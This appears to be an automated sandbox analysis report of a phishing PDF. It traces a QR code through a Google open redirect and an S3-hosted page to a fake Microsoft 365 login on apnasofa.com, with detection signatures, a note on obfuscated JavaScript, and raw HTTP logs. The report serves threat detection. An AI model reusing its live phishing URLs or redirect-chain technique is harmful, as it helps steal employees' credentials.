Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Employee_Important_Message.pdf

Overview

General Information

Sample name:Employee_Important_Message.pdf
Analysis ID:1566807
MD5:40ecbdeb048b52cbfbf201bf4579a6ff
SHA1:33757b1ada30b85277e883b13bcd885adcd101a4
SHA256:2fbc05e0ef487d6b78891eb850078ecc3f73688538bced4a464d1473fa719ca4
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware

Classification

  • System is w10x64
  • Acrobat.exe (PID: 3636 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Employee_Important_Message.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 3448 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7348 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1616,i,3436419427165153113,17725779986340987366,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 7916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.sn/url?q=lheard@wc.com&wc.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#bGhlYXJkQHdjLmNvbQ== MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7380 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1960,i,2475792775790874993,11739866391639367341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://apnasofa.com/episode/index#bGhlYXJkQHdjLmNvbQ==SlashNext: Label: Credential Stealing type: Phishing & Social Engineering
Source: https://apnasofa.com/episode/index#Avira URL Cloud: Label: malware
Source: https://apnasofa.com/episode/script.jsAvira URL Cloud: Label: malware
Source: https://apnasofa.com/episode/style.cssAvira URL Cloud: Label: malware
Source: https://apnasofa.com/episode/image/logo.pngAvira URL Cloud: Label: malware
Source: https://apnasofa.com/episode/indexAvira URL Cloud: Label: malware
Source: https://apnasofa.com/favicon.icoAvira URL Cloud: Label: malware

Phishing

barindex
Source: https://apnasofa.com/episode/index#bGhlYXJkQHdjLmNvbQ==Joe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft 365' is well-known and typically associated with the domain 'microsoft.com'., The URL 'apnasofa.com' does not match the legitimate domain for Microsoft 365., The domain 'apnasofa.com' does not have any apparent connection to Microsoft or its services., The presence of a generic or unrelated domain name is a common indicator of phishing., The input field email 'l2nqr7@gcjr.com' does not provide any additional context to suggest legitimacy. DOM: 1.0.pages.csv
Source: https://apnasofa.com/episode/index#bGhlYXJkQHdjLmNvbQ==Joe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft 365' is well-known and typically associated with the domain 'microsoft.com'., The URL 'apnasofa.com' does not match the legitimate domain for Microsoft 365., The domain 'apnasofa.com' does not have any apparent connection to Microsoft or its services., The presence of a generic email input field suggests a potential phishing attempt to collect user credentials. DOM: 1.1.pages.csv
Source: PDF documentJoe Sandbox AI: PDF document contains QR code
Source: https://apnasofa.com/episode/index#bGhlYXJkQHdjLmNvbQ==Joe Sandbox AI: Page contains button: 'Verify' Source: '1.0.pages.csv'
Source: https://apnasofa.com/episode/index#bGhlYXJkQHdjLmNvbQ==Joe Sandbox AI: Page contains button: 'Verify' Source: '1.1.pages.csv'
Source: 1.1..script.csvJoe Sandbox AI: Detected suspicious JavaScript: High-risk script detected: Uses atob() for obfuscation (+3), contains a large encoded payload (+3), includes a hardcoded 'secretkey' which might be used for malicious decryption (+1), and the length/complexity of encoded data suggests potential malware payload (+1). The obfuscation technique is commonly used to hide malicious code.
Source: https://apnasofa.com/episode/index#bGhlYXJkQHdjLmNvbQ==HTTP Parser: Number of links: 0
Source: https://apnasofa.com/episode/index#bGhlYXJkQHdjLmNvbQ==HTTP Parser: Title: pleased does not match URL
Source: https://apnasofa.com/episode/index#bGhlYXJkQHdjLmNvbQ==HTTP Parser: No favicon
Source: https://apnasofa.com/episode/index#bGhlYXJkQHdjLmNvbQ==HTTP Parser: No favicon
Source: https://apnasofa.com/episode/index#bGhlYXJkQHdjLmNvbQ==HTTP Parser: No <meta name="author".. found
Source: https://apnasofa.com/episode/index#bGhlYXJkQHdjLmNvbQ==HTTP Parser: No <meta name="author".. found
Source: https://apnasofa.com/episode/index#bGhlYXJkQHdjLmNvbQ==HTTP Parser: No <meta name="copyright".. found
Source: https://apnasofa.com/episode/index#bGhlYXJkQHdjLmNvbQ==HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.sn to https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 178.79.238.0
Source: unknownTCP traffic detected without corresponding DNS query: 178.79.238.0
Source: unknownTCP traffic detected without corresponding DNS query: 178.79.238.0
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: global trafficHTTP traffic detected: GET /url?q=lheard@wc.com&wc.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1Host: www.google.snConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1Host: www.google.snConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=cT6yRArz5LPOngWUt5-gDsrB6NSNUY1EfMxZpdNoyZ7ircpxiYVNljQhn84VPXFa0haU2BAPEqEgGwGM6GYQ4qBSgvaJFGh_YrCXHyhveczuLydmkMSbblVsEG6B4bqvGtVVT7MszTIXRQfteAIQunFlGlhDMx5pHdI419-mECkLjAGtHBFOJE1GbrLGD3HxR8A00g
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /vocabulary.html HTTP/1.1Host: i--iy.s3.us-east-1.amazonaws.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /episode/index HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://i--iy.s3.us-east-1.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /episode/style.css HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://apnasofa.com/episode/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2nvR5RnwFWOGpbB&MD=eSUd7a8V HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /episode/image/logo.png HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apnasofa.com/episode/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /episode/script.js HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://apnasofa.com/episode/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://apnasofa.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://apnasofa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /episode/script.js HTTP/1.1Host: apnasofa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /episode/image/logo.png HTTP/1.1Host: apnasofa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apnasofa.com/episode/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /json/8.46.123.228 HTTP/1.1Host: ipwhois.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://apnasofa.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://apnasofa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /json/8.46.123.228 HTTP/1.1Host: ipwhois.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2nvR5RnwFWOGpbB&MD=eSUd7a8V HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
